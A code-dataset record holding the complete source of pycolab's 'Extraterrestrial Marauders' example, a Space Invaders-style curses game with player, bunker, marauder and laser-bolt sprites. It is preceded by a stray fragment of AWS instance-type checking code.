nitro_types = ['p3dn.24xlarge', 'i3.metal', 'u-6tb1.metal', 'u-9tb1.metal', 'u-12tb1.metal']
return any(instance_type.startswith(prefix + '.') for prefix in nitro_prefixes) or instance_type in nitro_types
| 51.697674 | 115 | 0.552182 |
4a25afbf63b5a90156568d659f9b7fe52dfe55b0 | 11,800 | py | Python | pycolab/examples/extraterrestrial_marauders.py | simonalford42/pycolab | 2c6a6c9d4a86522ab3e2208b3e87f2eb3bb580cf | [
"Apache-2.0"
] | 666 | 2017-11-16T16:45:23.000Z | 2022-03-24T11:48:59.000Z | pycolab/examples/extraterrestrial_marauders.py | simonalford42/pycolab | 2c6a6c9d4a86522ab3e2208b3e87f2eb3bb580cf | [
"Apache-2.0"
] | 3 | 2021-09-08T03:31:49.000Z | 2022-03-12T00:59:45.000Z | rlpyt/envs/pycolab/pycolab/examples/extraterrestrial_marauders.py | williamd4112/curiosity_baselines | 45939f3f24c53cfff5153ef012486a6a058660be | [
"MIT"
] | 124 | 2017-11-17T15:01:17.000Z | 2022-02-03T16:52:26.000Z | # Copyright 2017 the pycolab Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defeat marauders from somewhere exterior to this planet.
Keys: left, right - move. space - fire. q - quit.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import curses
import numpy as np
import sys
from pycolab import ascii_art
from pycolab import human_ui
from pycolab import rendering
from pycolab import things as plab_things
from pycolab.prefab_parts import sprites as prefab_sprites
# Not shown in this ASCII art diagram are the Sprites we use for laser blasts,
# which control the characters listed in UPWARD_BOLT_CHARS and
# DOWNWARD_BOLT_CHARS below.
GAME_ART = [' X X X X X X X X ', # Row 0
' X X X X X X X X ',
' X X X X X X X X ',
' X X X X X X X X ',
' X X X X X X X X ',
' ', # Row 5
' ',
' ',
' ',
' ',
' ', # Row 10. If a Marauder
' BBBB BBBB BBBB BBBB ', # makes it to row 10,
' BBBB BBBB BBBB BBBB ', # the game is over.
' BBBB BBBB BBBB BBBB ',
' ',
' P ']
# Characters listed in UPWARD_BOLT_CHARS are used for Sprites that represent
# laser bolts that the player shoots toward Marauders. Add more characters if
# you want to be able to have more than two of these bolts in the "air" at once.
UPWARD_BOLT_CHARS = 'abcd'
# Characters listed in DOWNWARD_BOLT_CHARS are used for Sprites that represent
# laser bolts that Marauders shoot toward the player. Add more charcters if you
# want more shooting from the Marauders.
DOWNWARD_BOLT_CHARS = 'yz'
# Shorthand for various points in the program:
_ALL_BOLT_CHARS = UPWARD_BOLT_CHARS + DOWNWARD_BOLT_CHARS
# To make life a bit easier for the player (and avoid the need for frame
# stacking), we use different characters to indicate the directions that the
# bolts go. If you'd like to make this game harder, you might try mapping both
# kinds of bolts to the same character.
LASER_REPAINT_MAPPING = dict(
[(b, '^') for b in UPWARD_BOLT_CHARS] +
[(b, '|') for b in DOWNWARD_BOLT_CHARS])
# These colours are only for humans to see in the CursesUi.
COLOURS_FG = {' ': (0, 0, 0), # Space, inky blackness of.
'X': (999, 999, 999), # The Marauders.
'B': (400, 50, 30), # The bunkers.
'P': (0, 999, 0), # The player.
'^': (0, 999, 999), # Bolts from player to aliens.
'|': (0, 999, 999)} # Bolts from aliens to player.
COLOURS_BG = {'^': (0, 0, 0), # Bolts from player to aliens.
'|': (0, 0, 0)} # Bolts from aliens to player.
def make_game():
"""Builds and returns an Extraterrestrial Marauders game."""
return ascii_art.ascii_art_to_game(
GAME_ART, what_lies_beneath=' ',
sprites=dict(
[('P', PlayerSprite)] +
[(c, UpwardLaserBoltSprite) for c in UPWARD_BOLT_CHARS] +
[(c, DownwardLaserBoltSprite) for c in DOWNWARD_BOLT_CHARS]),
drapes=dict(X=MarauderDrape,
B=BunkerDrape),
update_schedule=['P', 'B', 'X'] + list(_ALL_BOLT_CHARS))
class BunkerDrape(plab_things.Drape):
"""A `Drape` for the bunkers at the bottom of the screen.
Bunkers are gradually eroded by laser bolts, for which the user loses one
point. Other than that, they don't really do much. If a laser bolt hits a
bunker, this Drape leaves a note about it in the Plot---the bolt's Sprite
checks this and removes itself from the board if it's present.
"""
def update(self, actions, board, layers, backdrop, things, the_plot):
# Where are the laser bolts? Bolts from players or marauders do damage.
bolts = np.logical_or.reduce([layers[c] for c in _ALL_BOLT_CHARS], axis=0)
hits = bolts & self.curtain # Any hits to a bunker?
np.logical_xor(self.curtain, hits, self.curtain) # If so, erode the bunker...
the_plot.add_reward(-np.sum(hits)) # ...and impose a penalty.
# Save the identities of bunker-striking bolts in the Plot.
the_plot['bunker_hitters'] = [chr(c) for c in board[hits]]
class MarauderDrape(plab_things.Drape):
"""A `Drape` for the marauders descending downward toward the player.
The Marauders all move in lockstep, which makes them an ideal application of
a Drape. Bits of the Drape get eroded by laser bolts from the player; each
hit earns ten points. If the Drape goes completely empty, or if any Marauder
makes it down to row 10, the game terminates.
As with `BunkerDrape`, if a laser bolt hits a Marauder, this Drape leaves a
note about it in the Plot; the bolt's Sprite checks this and removes itself
from the board if present.
"""
def __init__(self, curtain, character):
# The constructor just sets the Marauder's initial horizontal direction.
super(MarauderDrape, self).__init__(curtain, character)
self._dx = -1
def update(self, actions, board, layers, backdrop, things, the_plot):
# Where are the laser bolts? Only bolts from the player kill a Marauder.
bolts = np.logical_or.reduce([layers[c] for c in UPWARD_BOLT_CHARS], axis=0)
hits = bolts & self.curtain # Any hits to Marauders?
np.logical_xor(self.curtain, hits, self.curtain) # If so, zap the marauder...
the_plot.add_reward(np.sum(hits)*10) # ...and supply a reward.
# Save the identities of marauder-striking bolts in the Plot.
the_plot['marauder_hitters'] = [chr(c) for c in board[hits]]
# If no Marauders are left, or if any are sitting on row 10, end the game.
if (not self.curtain.any()) or self.curtain[10, :].any():
return the_plot.terminate_episode() # i.e. return None.
# We move faster if there are fewer Marauders. The odd divisor causes speed
# jumps to align on the high sides of multiples of 8; so, speed increases as
# the number of Marauders decreases to 32 (or 24 etc.), not 31 (or 23 etc.).
if the_plot.frame % max(1, np.sum(self.curtain)//8.0000001): return
# If any Marauder reaches either side of the screen, reverse horizontal
# motion and advance vertically one row.
if np.any(self.curtain[:, 0] | self.curtain[:, -1]):
self._dx = -self._dx
self.curtain[:] = np.roll(self.curtain, shift=1, axis=0)
self.curtain[:] = np.roll(self.curtain, shift=self._dx, axis=1)
class PlayerSprite(prefab_sprites.MazeWalker):
"""A `Sprite` for our player.
This `Sprite` simply ties actions to going left and right. In interactive
settings, the user can also quit.
"""
def __init__(self, corner, position, character):
"""Simply indicates to the superclass that we can't walk off the board."""
super(PlayerSprite, self).__init__(
corner, position, character, impassable='', confined_to_board=True)
def update(self, actions, board, layers, backdrop, things, the_plot):
del layers, backdrop, things # Unused.
if actions == 0: # go leftward?
self._west(board, the_plot)
elif actions == 1: # go rightward?
self._east(board, the_plot)
elif actions == 4: # quit?
the_plot.terminate_episode()
class UpwardLaserBoltSprite(prefab_sprites.MazeWalker):
"""Laser bolts shot from the player toward Marauders."""
def __init__(self, corner, position, character):
"""Starts the Sprite in a hidden position off of the board."""
super(UpwardLaserBoltSprite, self).__init__(
corner, position, character, impassable='')
self._teleport((-1, -1))
def update(self, actions, board, layers, backdrop, things, the_plot):
if self.visible:
self._fly(board, layers, things, the_plot)
elif actions == 2:
self._fire(layers, things, the_plot)
def _fly(self, board, layers, things, the_plot):
"""Handles the behaviour of visible bolts flying toward Marauders."""
# Disappear if we've hit a Marauder or a bunker.
if (self.character in the_plot['bunker_hitters'] or
self.character in the_plot['marauder_hitters']):
return self._teleport((-1, -1))
# Otherwise, northward!
self._north(board, the_plot)
def _fire(self, layers, things, the_plot):
"""Launches a new bolt from the player."""
# We don't fire if the player fired another bolt just now.
if the_plot.get('last_player_shot') == the_plot.frame: return
the_plot['last_player_shot'] = the_plot.frame
# We start just above the player.
row, col = things['P'].position
self._teleport((row-1, col))
class DownwardLaserBoltSprite(prefab_sprites.MazeWalker):
"""Laser bolts shot from Marauders toward the player."""
def __init__(self, corner, position, character):
"""Starts the Sprite in a hidden position off of the board."""
super(DownwardLaserBoltSprite, self).__init__(
corner, position, character, impassable='')
self._teleport((-1, -1))
def update(self, actions, board, layers, backdrop, things, the_plot):
if self.visible:
self._fly(board, layers, things, the_plot)
else:
self._fire(layers, the_plot)
def _fly(self, board, layers, things, the_plot):
"""Handles the behaviour of visible bolts flying toward the player."""
# Disappear if we've hit a bunker.
if self.character in the_plot['bunker_hitters']:
return self._teleport((-1, -1))
# End the game if we've hit the player.
if self.position == things['P'].position: the_plot.terminate_episode()
self._south(board, the_plot)
def _fire(self, layers, the_plot):
"""Launches a new bolt from a random Marauder."""
# We don't fire if another Marauder fired a bolt just now.
if the_plot.get('last_marauder_shot') == the_plot.frame: return
the_plot['last_marauder_shot'] = the_plot.frame
# Which Marauder should fire the laser bolt?
col = np.random.choice(np.nonzero(layers['X'].sum(axis=0))[0])
row = np.nonzero(layers['X'][:, col])[0][-1] + 1
# Move ourselves just below that Marauder.
self._teleport((row, col))
def main(argv=()):
del argv # Unused.
# Build an Extraterrestrial Marauders game.
game = make_game()
# Build an ObservationCharacterRepainter that will make laser bolts of the
# same type all look identical.
repainter = rendering.ObservationCharacterRepainter(LASER_REPAINT_MAPPING)
# Make a CursesUi to play it with.
ui = human_ui.CursesUi(
keys_to_actions={curses.KEY_LEFT: 0, curses.KEY_RIGHT: 1,
' ': 2, # shoot
-1: 3, # no-op
'q': 4}, # quit
repainter=repainter, delay=300,
colour_fg=COLOURS_FG, colour_bg=COLOURS_BG)
# Let the game begin!
ui.play(game)
if __name__ == '__main__':
main(sys.argv)
| 41.549296 | 82 | 0.644576 |
Subsets and Splits